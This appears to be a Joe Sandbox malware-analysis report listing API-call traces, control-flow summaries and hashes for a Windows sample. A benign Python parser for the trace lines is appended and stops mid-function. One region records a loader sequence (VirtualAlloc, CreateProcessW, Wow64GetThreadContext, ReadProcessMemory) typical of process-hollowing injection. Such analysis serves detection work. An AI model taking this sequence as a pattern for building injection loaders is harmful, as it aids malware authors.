• API String ID: 3886058894-0
• Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
• Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _memset.LIBCMT ref: 00401C62
                                                                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                            • String ID: Line:
                                                                                                                            • API String ID: 1620655955-1585850449
                                                                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 445 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShow
                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 446 3ddc3b8-3ddc4f5 call 3dda008 call 3ddc2a8 CreateFileW 453 3ddc4fc-3ddc50c 446->453 454 3ddc4f7 446->454 457 3ddc50e 453->457 458 3ddc513-3ddc52d VirtualAlloc 453->458 455 3ddc5ac-3ddc5b1 454->455 457->455 459 3ddc52f 458->459 460 3ddc531-3ddc548 ReadFile 458->460 459->455 461 3ddc54c-3ddc586 call 3ddc2e8 call 3ddb2a8 460->461 462 3ddc54a 460->462 467 3ddc588-3ddc59d call 3ddc338 461->467 468 3ddc5a2-3ddc5aa ExitProcess 461->468 462->455 467->468 468->455
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03DDC2A8: Sleep.KERNELBASE(000001F4), ref: 03DDC2B9
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DDC4EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileSleep
                                                                                                                            • String ID: D37CQX8XG9W5VXR7
                                                                                                                            • API String ID: 2694422964-141538130
                                                                                                                            • Opcode ID: 940321b65b91a7e82ee4f0c83cdf54ffdc6368fc8143c373afdac5a500eb2a6f
                                                                                                                            • Instruction ID: 71bf4f63da1259192fd49c370d982107a0a5e7d7a04005c17cbe94096a992c5a
                                                                                                                            • Opcode Fuzzy Hash: 940321b65b91a7e82ee4f0c83cdf54ffdc6368fc8143c373afdac5a500eb2a6f
                                                                                                                            • Instruction Fuzzy Hash: B1519030D14248EBEF21DBE4C855BEEBB79AF05300F004199E608BB2C0D7BA1B45CB65

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 470 413a88-413a99 call 41718c 473 413b10-413b15 call 4171d1 470->473 474 413a9b-413aa2 470->474 475 413aa4-413abc call 418407 call 419f6d 474->475 476 413ae7 474->476 488 413ac7-413ad7 call 413ade 475->488 489 413abe-413ac6 call 419f9d 475->489 478 413ae8-413af8 RtlFreeHeap 476->478 478->473 481 413afa-413b0f call 417f23 GetLastError call 417ee1 478->481 481->473 488->473 495 413ad9-413adc 488->495 489->488 495->478
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 00413AA6
                                                                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                            • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                            • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                            • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714421763-0
                                                                                                                            • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                            • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                            • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                            • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-554117064
                                                                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                            • _strcat.LIBCMT ref: 0040F603
                                                                                                                              • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                              • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 1194219731-2761332787
                                                                                                                            • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                            • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03DDBA63
                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DDBAF9
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DDBB1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
• Instruction ID: d88cbaafdaddd9b3062af23be302dfa44e3d40e897452c0bfd8b2830dea009ae
• Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
• Instruction Fuzzy Hash: B762F930A142589BEB24CFA4C850BDEB376EF58704F1091A9D10DEB2A4E7799E81CB59
APIs
• _memset.LIBCMT ref: 0040E202
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
• Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
• Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
• Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
• Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
APIs
• _malloc.LIBCMT ref: 00411734
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
• std::bad_exception::bad_exception.LIBCMT ref: 0041176B
• __CxxThrowException@8.LIBCMT ref: 00411779
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
• Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: BuffCharLower
• String ID: $8'I
• API String ID: 2358735015-3608026889
• Opcode ID: 748fd34e705feece15d68f8c3a217e3aa4bbfba358ae0ad0ee494a8265da257e
• Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
• Opcode Fuzzy Hash: 748fd34e705feece15d68f8c3a217e3aa4bbfba358ae0ad0ee494a8265da257e
• Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
APIs
• RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
• RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
• Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• _malloc.LIBCMT ref: 00435288
• _malloc.LIBCMT ref: 00435298
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
• Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
APIs
• _wcslen.LIBCMT ref: 00401B71
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: @EXITCODE
• API String ID: 580348202-3436989551
• Opcode ID: cf09f8cc563ea490457be074e3f36df2996e570d733701a8ccb845f104b99734
• Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
• Opcode Fuzzy Hash: cf09f8cc563ea490457be074e3f36df2996e570d733701a8ccb845f104b99734
• Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
• Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
• Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
• Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
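Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the "APIs" trace entries in the function records above. It reads the Name.Module(args), ref: ADDR format, keeps the raw stack slots, and decodes the CreateFileW access/share/disposition values and the RegOpenKeyExW root key into their documented Win32 names, so that the two CreateFileW entries read as a GENERIC_READ/OPEN_EXISTING open and a GENERIC_READ|GENERIC_WRITE/OPEN_ALWAYS open, and the registry call as an HKEY_CURRENT_USER lookup of Control Panel\Mouse. The sample lines are copied from this page; the constant tables are documented Win32 values rather than anything taken from the report. One caveat the parser accounts for: the trace prints more stack slots than the API has parameters (CreateFileW has seven, the entry shows thirteen), so only the leading slots are interpreted.

```python
"""Parse Joe Sandbox 'APIs' trace entries and decode well-known argument values.

Added example for reading the function records on this page; it is not part of
the Joe Sandbox report or of the analysed sample.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One entry: [• ][Part of subcall function XXXX: ]Name.Module[(args)][,] ref: ADDR
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX = re.compile(r"^[0-9A-Fa-f]{1,8}$")

# Documented Win32 constants (not values taken from the report).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_ROOT = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

# Trace entries copied from the records on this page (last line is a non-API line).
SAMPLE = r"""
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
• RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int
    args: List[str] = field(default_factory=list)
    caller: Optional[int] = None


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one trace entry, or None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    caller = int(m.group("caller"), 16) if m.group("caller") else None
    return ApiCall(m.group("name"), m.group("module"), int(m.group("ref"), 16), args, caller)


def as_int(tok: str) -> Optional[int]:
    """Hex stack slot -> int; '?' and string arguments give None."""
    return int(tok, 16) if HEX.match(tok) else None


def decode_flags(value: Optional[int], table: dict) -> str:
    """Bitmask -> 'NAME|NAME'; unknown leftover bits are kept as hex."""
    if value is None:
        return "?"
    names, rest = [], value
    for bit, name in table.items():
        if (value & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest or not names:
        names.append(hex(rest))
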